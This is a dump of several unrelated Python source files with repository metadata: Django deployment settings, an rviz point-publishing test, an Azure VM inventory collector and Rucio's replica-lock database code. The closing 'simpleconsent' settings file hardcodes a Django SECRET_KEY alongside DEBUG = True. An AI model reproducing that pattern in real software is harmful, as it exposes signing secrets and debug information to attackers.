# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_DEFAULT_ACL = None
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# STATIC
# ------------------------
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# MEDIA
# ------------------------------------------------------------------------------
DEFAULT_FILE_STORAGE = "university_dost.utils.storages.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[-1]["OPTIONS"]["loaders"] = [ # type: ignore[index] # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
"DJANGO_DEFAULT_FROM_EMAIL", default="University Dost <noreply@universitydost.in>"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default="[University Dost]")
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"] # noqa F405
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
# https://anymail.readthedocs.io/en/stable/esps/mailgun/
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
ANYMAIL = {
"MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
"MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
"MAILGUN_API_URL": env("MAILGUN_API_URL", default="https://api.mailgun.net/v3"),
}
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"root": {"level": "INFO", "handlers": ["console"]},
"loggers": {
"django.db.backends": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
# Errors logged by the SDK itself
"sentry_sdk": {"level": "ERROR", "handlers": ["console"], "propagate": False},
"django.security.DisallowedHost": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
},
}
# Sentry
# ------------------------------------------------------------------------------
SENTRY_DSN = env("SENTRY_DSN")
SENTRY_LOG_LEVEL = env.int("DJANGO_SENTRY_LOG_LEVEL", logging.INFO)
sentry_logging = LoggingIntegration(
level=SENTRY_LOG_LEVEL, # Capture info and above as breadcrumbs
event_level=logging.ERROR, # Send errors as events
)
sentry_sdk.init(
dsn=SENTRY_DSN,
integrations=[sentry_logging, DjangoIntegration(), CeleryIntegration()],
)
# Your stuff...
# ------------------------------------------------------------------------------
| 41.597938 | 91 | 0.627138 |
b3d230e85af6dae941f333ca20af640328777574 | 530 | py | Python | src/test/send_point.py | yinzixuan126/rviz | c228cf5e03ef44c7581f449a34845722fe10f9a3 | [
"MIT"
] | 9 | 2017-12-17T07:43:15.000Z | 2021-10-10T15:03:39.000Z | melodic/src/rviz/src/test/send_point.py | disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA | 3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0 | [
"BSD-3-Clause"
] | null | null | null | melodic/src/rviz/src/test/send_point.py | disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA | 3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0 | [
"BSD-3-Clause"
] | 6 | 2016-01-27T03:40:58.000Z | 2021-06-15T08:12:14.000Z | #!/usr/bin/env python
import roslib; roslib.load_manifest('rviz')
from geometry_msgs.msg import PointStamped
import math
import rospy
topic = 'test_point'
publisher = rospy.Publisher(topic, PointStamped)
rospy.init_node('send_point')
t = 0
while not rospy.is_shutdown():
p = PointStamped()
p.header.frame_id = "/base_link"
p.header.stamp = rospy.Time.now()
r = 5.0
p.point.x = r * math.cos( t )
p.point.y = r * math.sin( t )
p.point.z = 0
publisher.publish( p )
t += .1
rospy.sleep(0.03)
| 17.666667 | 48 | 0.660377 |
00e1af432db3abc6bde4a12139f65d7a1a7b22e0 | 11,635 | py | Python | src/spaceone/inventory/manager/collector_manager.py | jihyungSong/plugin-azure-vm-inven-collector | 9ce42c67ea10aedeffdc457657de7c13f1b31617 | [
"Apache-2.0"
] | null | null | null | src/spaceone/inventory/manager/collector_manager.py | jihyungSong/plugin-azure-vm-inven-collector | 9ce42c67ea10aedeffdc457657de7c13f1b31617 | [
"Apache-2.0"
] | null | null | null | src/spaceone/inventory/manager/collector_manager.py | jihyungSong/plugin-azure-vm-inven-collector | 9ce42c67ea10aedeffdc457657de7c13f1b31617 | [
"Apache-2.0"
] | null | null | null | __all__ = ['CollectorManager']
import logging
from spaceone.core.manager import BaseManager
from spaceone.inventory.connector import AzureVMConnector
from spaceone.inventory.manager.azure import AzureDiskManager, AzureLoadBalancerManager, \
AzureNetworkSecurityGroupManager, AzureNICManager, AzureResourceGroupManager, AzureVmManager, \
AzureVMScaleSetManager, AzureVNetManager
from spaceone.inventory.manager.metadata.metadata_manager import MetadataManager
from spaceone.inventory.model.server import Server, ReferenceModel
from spaceone.inventory.model.region import Region
from spaceone.inventory.model.subscription import Subscription
from spaceone.inventory.model.cloud_service_type import CloudServiceType
from spaceone.inventory.model.monitor import Monitor
from spaceone.inventory.model.resource import ErrorResourceResponse, ServerResourceResponse
from spaceone.inventory.model.metadata.metadata import CloudServiceTypeMetadata
from spaceone.inventory.model.metadata.metadata_dynamic_field import TextDyField
from spaceone.inventory.conf.cloud_service_conf import *
from spaceone.core.utils import *
_LOGGER = logging.getLogger(__name__)
class CollectorManager(BaseManager):
def __init__(self, transaction):
super().__init__(transaction)
# self.azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
def verify(self, options, secret_data):
""" Check connection
"""
azure_vm_connector = self.locator.get_connector('AzureVMConnector')
r = azure_vm_connector.verify(options, secret_data)
# ACTIVE/UNKNOWN
return r
def list_all_resource_groups(self, params):
azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
azure_vm_connector.set_connect(params['secret_data'])
rg_manager: AzureResourceGroupManager = AzureResourceGroupManager(params, azure_vm_connector=azure_vm_connector)
return rg_manager.list_all_resource_groups()
def list_vms(self, params, resource_group_name):
azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
azure_vm_connector.set_connect(params['secret_data'])
vm_manager: AzureVmManager = AzureVmManager(params, azure_vm_connector=azure_vm_connector)
vms = vm_manager.list_vms(resource_group_name)
region_name = params['secret_data'].get('region_name')
if region_name:
return [vm for vm in vms if vm.location == region_name]
return vms
def list_all_vms(self, params):
azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
azure_vm_connector.set_connect(params['secret_data'])
vm_manager: AzureVmManager = AzureVmManager(params, azure_vm_connector=azure_vm_connector)
return vm_manager.list_all_vms()
def list_all_resources(self, params):
servers = []
errors = []
azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
azure_vm_connector.set_connect(params['secret_data'])
resource_group = params['resource_group']
resource_group_name = params['resource_group'].name
subscription = params['secret_data'].get('subscription_id')
# call all managers
vm_manager: AzureVmManager = AzureVmManager(params, azure_vm_connector=azure_vm_connector)
disk_manager: AzureDiskManager = AzureDiskManager(params, azure_vm_connector=azure_vm_connector)
load_balancer_manager: AzureLoadBalancerManager = \
AzureLoadBalancerManager(params, azure_vm_connector=azure_vm_connector)
network_security_group_manager: AzureNetworkSecurityGroupManager = \
AzureNetworkSecurityGroupManager(params, azure_vm_connector=azure_vm_connector)
nic_manager: AzureNICManager = AzureNICManager(params, azure_vm_connector=azure_vm_connector)
resource_group_manager: AzureResourceGroupManager(params, azure_vm_connector=azure_vm_connector)
# vmss_manager: AzureVMScaleSetManager = AzureVMScaleSetManager(params, azure_vm_connector=azure_vm_connector)
vnet_manager: AzureVNetManager = AzureVNetManager(params, azure_vm_connector=azure_vm_connector)
meta_manager: MetadataManager = MetadataManager()
vms = params['vms']
load_balancers = list(azure_vm_connector.list_load_balancers(resource_group_name))
network_security_groups = list(azure_vm_connector.list_network_security_groups(resource_group_name))
network_interfaces = list(azure_vm_connector.list_network_interfaces(resource_group_name))
list_disks = list(azure_vm_connector.list_disk())
public_ip_addresses = list(azure_vm_connector.list_public_ip_address(resource_group_name))
virtual_networks = list(azure_vm_connector.list_virtual_network(resource_group_name))
# vmss = list(azure_vm_connector.list_virtual_machine_scale_sets(resource_group_name))
# if vmss:
# for scale_set in vmss:
# print(scale_set.name)
# scale_set_vms = list(azure_vm_connector.list_scale_set_vms(resource_group_name, scale_set.name))
# pprint.pprint(scale_set_vms)
# for ss in scale_set_vms:
# vms.append(ss)
# vms.append(scale_set_vms)
subscription_info = azure_vm_connector.get_subscription_info(subscription)
subscription_data = {
'subscription_id': subscription_info.subscription_id,
'subscription_name': subscription_info.display_name,
'tenant_id': subscription_info.tenant_id
}
vm_sizes = []
for vm in vms:
try:
vnet_data = None
subnet_data = None
lb_vos = []
disk_vos = disk_manager.get_disk_info(vm, list_disks)
nic_vos, primary_ip = nic_manager.get_nic_info(vm, network_interfaces, public_ip_addresses,
virtual_networks)
server_data = vm_manager.get_vm_info(vm, disk_vos, nic_vos, resource_group, subscription,
network_security_groups, vm_sizes, primary_ip)
if load_balancers is not None:
lb_vos = load_balancer_manager.get_load_balancer_info(vm, load_balancers, public_ip_addresses)
nsg_vos = network_security_group_manager.get_network_security_group_info(vm, network_security_groups,
network_interfaces)
nic_name = vm.network_profile.network_interfaces[0].id.split('/')[-1]
if nic_name is not None:
vnet_subnet_dict = vnet_manager.get_vnet_subnet_info(nic_name, network_interfaces, virtual_networks)
if vnet_subnet_dict.get('vnet_info'):
vnet_data = vnet_subnet_dict['vnet_info']
if vnet_subnet_dict.get('subnet_info'):
subnet_data = vnet_subnet_dict['subnet_info']
server_data.update({
'tags': self.get_tags(vm.tags)
})
server_data['data'].update({
'load_balancer': lb_vos,
'security_group': nsg_vos,
'vnet': vnet_data,
'subnet': subnet_data,
'subscription': Subscription(subscription_data, strict=False),
'azure_monitor': Monitor({
'resource_id': f'subscriptions/{subscription}/resourceGroups/{resource_group_name}/providers/Microsoft.Compute/virtualMachines/{server_data["name"]}'
}, strict=False)
})
server_data['data']['compute']['account'] = subscription_data['subscription_name']
server_data.update({
'_metadata': meta_manager.get_server_metadata(),
'reference': ReferenceModel({
'resource_id': server_data['data']['compute']['instance_id'],
'external_link': f"https://portal.azure.com/#@.onmicrosoft.com/resource/subscriptions/{subscription}/resourceGroups/{resource_group_name}/providers/Microsoft.Compute/virtualMachines/{server_data['data']['compute']['instance_name']}/overview"
}),
'account': subscription_data['subscription_id'],
'instance_type': server_data['data']['compute']['instance_type'],
'launched_at': datetime_to_iso8601(server_data['data']['compute']['launched_at'])
})
server_resource = Server(server_data, strict=False)
servers.append(ServerResourceResponse({'resource': server_resource}))
except Exception as e:
_LOGGER.error(f'[list_instances] [{vm.id}] {e}')
if type(e) is dict:
error_resource_response = ErrorResourceResponse({'message': json.dumps(e)})
else:
error_resource_response = ErrorResourceResponse({'message': str(e), 'resource': {'resource_id': vm.id}})
errors.append(error_resource_response)
return servers, errors
def list_resources(self, params):
""" Get list of resources
Args:
params:
- resource_group
- vms
Returns: list of resources
"""
start_time = time.time()
total_resources = []
try:
resources, error_resources = self.list_all_resources(params)
total_resources.extend(resources)
total_resources.extend(error_resources)
_LOGGER.debug(f'[{params["resource_group"].name}] Finished {time.time() - start_time} Seconds')
return total_resources
except Exception as e:
_LOGGER.debug(f'[list_resources]: {params["resource_group"].name}] : {e}')
if type(e) is dict:
error_resource_response = ErrorResourceResponse({'message': json.dumps(e)})
else:
error_resource_response = ErrorResourceResponse({'message': str(e)})
total_resources.append(error_resource_response)
return total_resources
@staticmethod
def list_cloud_service_types():
meta_manager: MetadataManager = MetadataManager()
cloud_service_type = {
'_metadata': meta_manager.get_cloud_service_type_metadata(),
'tags': {
'spaceone:icon': 'https://spaceone-custom-assets.s3.ap-northeast-2.amazonaws.com/console-assets/icons/azure-vm.svg',
}
}
return [CloudServiceType(cloud_service_type, strict=False)]
@staticmethod
def get_region_from_result(result):
match_region_info = REGION_INFO.get(getattr(result.data.compute, 'az', None))
if match_region_info:
region_info = match_region_info.copy()
region_info.update({
'region_code': result.region_code
})
return Region(region_info, strict=False)
return None
@staticmethod
def get_tags(tags):
tags_result = []
if tags:
for k, v in tags.items():
tags_result.append({
'key': k,
'value': v
})
return tags_result
| 45.272374 | 265 | 0.657585 |
3a1cc2afac52ad9d8694062b605bdd286ef3411a | 20,725 | py | Python | lib/rucio/core/lock.py | maatthias/rucio-old | 8600cdc0838886a2f076f2f88850770877fc505f | [
"Apache-2.0"
] | null | null | null | lib/rucio/core/lock.py | maatthias/rucio-old | 8600cdc0838886a2f076f2f88850770877fc505f | [
"Apache-2.0"
] | null | null | null | lib/rucio/core/lock.py | maatthias/rucio-old | 8600cdc0838886a2f076f2f88850770877fc505f | [
"Apache-2.0"
] | null | null | null | # Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Martin Barisits, <martin.barisits@cern.ch>, 2013-2019
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2013-2014
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2014-2018
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2014-2018
# - Thomas Beermann, <thomas.beermann@cern.ch>, 2014-2018
#
# PY3K COMPATIBLE
import logging
import sys
from datetime import datetime
from sqlalchemy.exc import DatabaseError
from sqlalchemy.sql.expression import and_, or_
import rucio.core.rule
import rucio.core.did
from rucio.common.config import config_get
from rucio.common.exception import RSENotFound
from rucio.core.lifetime_exception import define_eol
from rucio.core.rse import get_rse_name, get_rse_id
from rucio.db.sqla import models
from rucio.db.sqla.constants import LockState, RuleState, RuleGrouping, DIDType, RuleNotification
from rucio.db.sqla.session import read_session, transactional_session, stream_session
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
@stream_session
def get_dataset_locks(scope, name, session=None):
"""
Get the dataset locks of a dataset
:param scope: Scope of the dataset.
:param name: Name of the dataset.
:param session: The db session.
:return: List of dicts {'rse_id': ..., 'state': ...}
"""
query = session.query(models.DatasetLock.rse_id,
models.DatasetLock.scope,
models.DatasetLock.name,
models.DatasetLock.rule_id,
models.DatasetLock.account,
models.DatasetLock.state,
models.DatasetLock.length,
models.DatasetLock.bytes,
models.DatasetLock.accessed_at).filter_by(scope=scope, name=name)
dict = {}
for rse_id, scope, name, rule_id, account, state, length, bytes, accessed_at in query.yield_per(500):
if rse_id not in dict:
dict[rse_id] = get_rse_name(rse_id, session=session)
yield {'rse_id': rse_id,
'rse': dict[rse_id],
'scope': scope,
'name': name,
'rule_id': rule_id,
'account': account,
'state': state,
'length': length,
'bytes': bytes,
'accessed_at': accessed_at}
@stream_session
def get_dataset_locks_by_rse_id(rse_id, session=None):
"""
Get the dataset locks of an RSE.
:param rse_id: RSE id to get the locks from.
:param session: The db session.
:return: List of dicts {'rse_id': ..., 'state': ...}
"""
query = session.query(models.DatasetLock.rse_id,
models.DatasetLock.scope,
models.DatasetLock.name,
models.DatasetLock.rule_id,
models.DatasetLock.account,
models.DatasetLock.state,
models.DatasetLock.length,
models.DatasetLock.bytes,
models.DatasetLock.accessed_at).filter_by(rse_id=rse_id).\
with_hint(models.DatasetLock, "index(DATASET_LOCKS DATASET_LOCKS_RSE_ID_IDX)", 'oracle')
dict = {}
for rse_id, scope, name, rule_id, account, state, length, bytes, accessed_at in query.yield_per(500):
if rse_id not in dict:
dict[rse_id] = get_rse_name(rse_id, session=session)
yield {'rse_id': rse_id,
'rse': dict[rse_id],
'scope': scope,
'name': name,
'rule_id': rule_id,
'account': account,
'state': state,
'length': length,
'bytes': bytes,
'accessed_at': accessed_at}
@read_session
def get_replica_locks(scope, name, nowait=False, restrict_rses=None, session=None):
"""
Get the active replica locks for a file
:param scope: Scope of the did.
:param name: Name of the did.
:param nowait: Nowait parameter for the FOR UPDATE statement.
:param restrict_rses: Possible RSE_ids to filter on.
:param session: The db session.
:return: List of dicts {'rse': ..., 'state': ...}
:raises: NoResultFound
"""
query = session.query(models.ReplicaLock).filter_by(scope=scope, name=name)
if restrict_rses is not None:
rse_clause = []
for rse_id in restrict_rses:
rse_clause.append(models.ReplicaLock.rse_id == rse_id)
if rse_clause:
query = query.filter(or_(*rse_clause))
return query.with_for_update(nowait=nowait).all()
@read_session
def get_replica_locks_for_rule_id(rule_id, session=None):
"""
Get the active replica locks for a rule_id.
:param rule_id: Filter on rule_id.
:param session: The db session.
:return: List of dicts {'scope':, 'name':, 'rse': ..., 'state': ...}
:raises: NoResultFound
"""
locks = []
query = session.query(models.ReplicaLock).filter_by(rule_id=rule_id)
for row in query:
locks.append({'scope': row.scope,
'name': row.name,
'rse_id': row.rse_id,
'rse': get_rse_name(rse_id=row.rse_id, session=session),
'state': row.state,
'rule_id': row.rule_id})
return locks
@read_session
def get_replica_locks_for_rule_id_per_rse(rule_id, session=None):
"""
Get the active replica locks for a rule_id per rse.
:param rule_id: Filter on rule_id.
:param session: The db session.
:return: List of dicts {'rse_id':, 'rse':}
:raises: NoResultFound
"""
locks = []
query = session.query(models.ReplicaLock.rse_id).filter_by(rule_id=rule_id).group_by(models.ReplicaLock.rse_id)
for row in query:
locks.append({'rse_id': row.rse_id,
'rse': get_rse_name(rse_id=row.rse_id, session=session)})
return locks
@read_session
def get_files_and_replica_locks_of_dataset(scope, name, nowait=False, restrict_rses=None, only_stuck=False, session=None):
"""
Get all the files of a dataset and, if existing, all locks of the file.
:param scope: Scope of the dataset
:param name: Name of the datset
:param nowait: Nowait parameter for the FOR UPDATE statement
:param restrict_rses: Possible RSE_ids to filter on.
:param only_stuck: If true, only get STUCK locks.
:param session: The db session.
:return: Dictionary with keys: (scope, name)
and as value: [LockObject]
:raises: NoResultFound
"""
locks = {}
if session.bind.dialect.name == 'postgresql':
content_query = session.query(models.DataIdentifierAssociation.child_scope,
models.DataIdentifierAssociation.child_name).\
with_hint(models.DataIdentifierAssociation,
"INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)",
'oracle').\
filter(models.DataIdentifierAssociation.scope == scope,
models.DataIdentifierAssociation.name == name)
for child_scope, child_name in content_query.yield_per(1000):
locks[(child_scope, child_name)] = []
query = session.query(models.DataIdentifierAssociation.child_scope,
models.DataIdentifierAssociation.child_name,
models.ReplicaLock).\
with_hint(models.DataIdentifierAssociation,
"INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)",
'oracle').\
filter(and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
models.DataIdentifierAssociation.child_name == models.ReplicaLock.name))\
.filter(models.DataIdentifierAssociation.scope == scope,
models.DataIdentifierAssociation.name == name)
if restrict_rses is not None:
rse_clause = []
for rse_id in restrict_rses:
rse_clause.append(models.ReplicaLock.rse_id == rse_id)
if rse_clause:
query = session.query(models.DataIdentifierAssociation.child_scope,
models.DataIdentifierAssociation.child_name,
models.ReplicaLock).\
with_hint(models.DataIdentifierAssociation, "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)", 'oracle').\
filter(and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
models.DataIdentifierAssociation.child_name == models.ReplicaLock.name,
or_(*rse_clause)))\
.filter(models.DataIdentifierAssociation.scope == scope,
models.DataIdentifierAssociation.name == name)
else:
query = session.query(models.DataIdentifierAssociation.child_scope,
models.DataIdentifierAssociation.child_name,
models.ReplicaLock).\
with_hint(models.DataIdentifierAssociation, "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)", 'oracle').\
outerjoin(models.ReplicaLock,
and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
models.DataIdentifierAssociation.child_name == models.ReplicaLock.name))\
.filter(models.DataIdentifierAssociation.scope == scope, models.DataIdentifierAssociation.name == name)
if restrict_rses is not None:
rse_clause = []
for rse_id in restrict_rses:
rse_clause.append(models.ReplicaLock.rse_id == rse_id)
if rse_clause:
query = session.query(models.DataIdentifierAssociation.child_scope,
models.DataIdentifierAssociation.child_name,
models.ReplicaLock).\
with_hint(models.DataIdentifierAssociation, "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)", 'oracle').\
outerjoin(models.ReplicaLock,
and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
models.DataIdentifierAssociation.child_name == models.ReplicaLock.name,
or_(*rse_clause)))\
.filter(models.DataIdentifierAssociation.scope == scope,
models.DataIdentifierAssociation.name == name)
if only_stuck:
query = query.filter(models.ReplicaLock.state == LockState.STUCK)
query = query.with_for_update(nowait=nowait, of=models.ReplicaLock.state)
for child_scope, child_name, lock in query:
if (child_scope, child_name) not in locks:
if lock is None:
locks[(child_scope, child_name)] = []
else:
locks[(child_scope, child_name)] = [lock]
else:
locks[(child_scope, child_name)].append(lock)
return locks
@transactional_session
def successful_transfer(scope, name, rse_id, nowait, session=None):
"""
Update the state of all replica locks because of an successful transfer
:param scope: Scope of the did
:param name: Name of the did
:param rse_id: RSE id
:param nowait: Nowait parameter for the for_update queries.
:param session: DB Session.
"""
locks = session.query(models.ReplicaLock).with_for_update(nowait=nowait).filter_by(scope=scope, name=name, rse_id=rse_id)
for lock in locks:
if lock.state == LockState.OK:
continue
logging.debug('Marking lock %s:%s for rule %s on rse %s as OK' % (lock.scope, lock.name, str(lock.rule_id), str(lock.rse_id)))
# Update the rule counters
rule = session.query(models.ReplicationRule).with_for_update(nowait=nowait).filter_by(id=lock.rule_id).one()
logging.debug('Updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))
if lock.state == LockState.REPLICATING:
rule.locks_replicating_cnt -= 1
elif lock.state == LockState.STUCK:
rule.locks_stuck_cnt -= 1
rule.locks_ok_cnt += 1
lock.state = LockState.OK
logging.debug('Finished updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))
# Insert UpdatedCollectionReplica
if rule.did_type == DIDType.DATASET:
models.UpdatedCollectionReplica(scope=rule.scope,
name=rule.name,
did_type=rule.did_type,
rse_id=rse_id).save(flush=False, session=session)
elif rule.did_type == DIDType.CONTAINER:
# Resolve to all child datasets
for dataset in rucio.core.did.list_child_datasets(scope=rule.scope, name=rule.name, session=session):
models.UpdatedCollectionReplica(scope=dataset['scope'],
name=dataset['name'],
did_type=dataset['type'],
rse_id=rse_id).save(flush=False, session=session)
# Update the rule state
if rule.state == RuleState.SUSPENDED:
pass
elif rule.locks_stuck_cnt > 0:
pass
elif rule.locks_replicating_cnt == 0 and rule.state == RuleState.REPLICATING:
rule.state = RuleState.OK
# Try to update the DatasetLocks
if rule.grouping != RuleGrouping.NONE:
ds_locks = session.query(models.DatasetLock).with_for_update(nowait=nowait).filter_by(rule_id=rule.id)
for ds_lock in ds_locks:
ds_lock.state = LockState.OK
session.flush()
rucio.core.rule.generate_rule_notifications(rule=rule, replicating_locks_before=rule.locks_replicating_cnt + 1, session=session)
if rule.notification == RuleNotification.YES:
rucio.core.rule.generate_email_for_rule_ok_notification(rule=rule, session=session)
# Try to release potential parent rules
rucio.core.rule.release_parent_rule(child_rule_id=rule.id, session=session)
elif rule.locks_replicating_cnt > 0 and rule.state == RuleState.REPLICATING and rule.notification == RuleNotification.PROGRESS:
rucio.core.rule.generate_rule_notifications(rule=rule, replicating_locks_before=rule.locks_replicating_cnt + 1, session=session)
# Insert rule history
rucio.core.rule.insert_rule_history(rule=rule, recent=True, longterm=False, session=session)
session.flush()
@transactional_session
def failed_transfer(scope, name, rse_id, error_message=None, broken_rule_id=None, broken_message=None, nowait=True, session=None):
"""
Update the state of all replica locks because of a failed transfer.
If a transfer is permanently broken for a rule, the broken_rule_id should be filled which puts this rule into the SUSPENDED state.
:param scope: Scope of the did.
:param name: Name of the did.
:param rse_id: RSE id.
:param error_message: The error why this transfer failed.
:param broken_rule_id: Id of the rule which will be suspended.
:param broken_message: Error message for the suspended rule.
:param nowait: Nowait parameter for the for_update queries.
:param session: The database session in use.
"""
locks = session.query(models.ReplicaLock).with_for_update(nowait=nowait).filter_by(scope=scope, name=name, rse_id=rse_id)
for lock in locks:
if lock.state == LockState.STUCK:
continue
logging.debug('Marking lock %s:%s for rule %s on rse %s as STUCK' % (lock.scope, lock.name, str(lock.rule_id), str(lock.rse_id)))
# Update the rule counters
rule = session.query(models.ReplicationRule).with_for_update(nowait=nowait).filter_by(id=lock.rule_id).one()
logging.debug('Updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))
if lock.state == LockState.REPLICATING:
rule.locks_replicating_cnt -= 1
elif lock.state == LockState.OK:
rule.locks_ok_cnt -= 1
rule.locks_stuck_cnt += 1
lock.state = LockState.STUCK
logging.debug('Finished updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))
# Update the rule state
if rule.state == RuleState.SUSPENDED:
pass
elif lock.rule_id == broken_rule_id:
rule.state = RuleState.SUSPENDED
rule.error = (broken_message[:245] + '...') if len(broken_message) > 245 else broken_message
# Try to update the DatasetLocks
if rule.grouping != RuleGrouping.NONE:
ds_locks = session.query(models.DatasetLock).with_for_update(nowait=nowait).filter_by(rule_id=rule.id)
for ds_lock in ds_locks:
ds_lock.state = LockState.STUCK
elif rule.locks_stuck_cnt > 0:
if rule.state != RuleState.STUCK:
rule.state = RuleState.STUCK
# Try to update the DatasetLocks
if rule.grouping != RuleGrouping.NONE:
ds_locks = session.query(models.DatasetLock).with_for_update(nowait=nowait).filter_by(rule_id=rule.id)
for ds_lock in ds_locks:
ds_lock.state = LockState.STUCK
if rule.error != error_message:
rule.error = (error_message[:245] + '...') if len(error_message) > 245 else error_message
# Insert rule history
rucio.core.rule.insert_rule_history(rule=rule, recent=True, longterm=False, session=session)
@transactional_session
def touch_dataset_locks(dataset_locks, session=None):
"""
Update the accessed_at timestamp of the given dataset locks + eol_at.
:param replicas: the list of dataset locks.
:param session: The database session in use.
:returns: True, if successful, False otherwise.
"""
rse_ids, now = {}, datetime.utcnow()
for dataset_lock in dataset_locks:
try:
if 'rse_id' not in dataset_lock:
if dataset_lock['rse'] not in rse_ids:
rse_ids[dataset_lock['rse']] = get_rse_id(rse=dataset_lock['rse'], session=session)
dataset_lock['rse_id'] = rse_ids[dataset_lock['rse']]
except RSENotFound:
continue
eol_at = define_eol(dataset_lock['scope'], dataset_lock['name'], rses=[{'id': dataset_lock['rse_id']}], session=session)
try:
session.query(models.DatasetLock).filter_by(scope=dataset_lock['scope'], name=dataset_lock['name'], rse_id=dataset_lock['rse_id']).\
update({'accessed_at': dataset_lock.get('accessed_at') or now}, synchronize_session=False)
for res in session.query(models.DatasetLock.rule_id).filter_by(scope=dataset_lock['scope'], name=dataset_lock['name'], rse_id=dataset_lock['rse_id']):
session.query(models.ReplicationRule).filter_by(id=res[0]).update({'eol_at': eol_at}, synchronize_session=False)
except DatabaseError:
return False
return True
| 46.88914 | 165 | 0.614234 |
1c6b071f4f198e20aa26962ed66a10164b33c860 | 4,220 | py | Python | simpleconsent/settings.py | rhoerbe/simpleconsent | 5c75bb3794d2722853aa8f5963a5c013e1149074 | [
"MIT"
] | 1 | 2019-08-19T17:56:57.000Z | 2019-08-19T17:56:57.000Z | simpleconsent/settings.py | rhoerbe/simpleconsent | 5c75bb3794d2722853aa8f5963a5c013e1149074 | [
"MIT"
] | null | null | null | simpleconsent/settings.py | rhoerbe/simpleconsent | 5c75bb3794d2722853aa8f5963a5c013e1149074 | [
"MIT"
] | 1 | 2019-08-19T17:57:14.000Z | 2019-08-19T17:57:14.000Z | # this file contains secret keys. Protect file or insert values from environment
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '66_!!m)!ks&v)2cjy)m6+uhtm%0jz7*1+tu@whlebrqsb@b##z'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
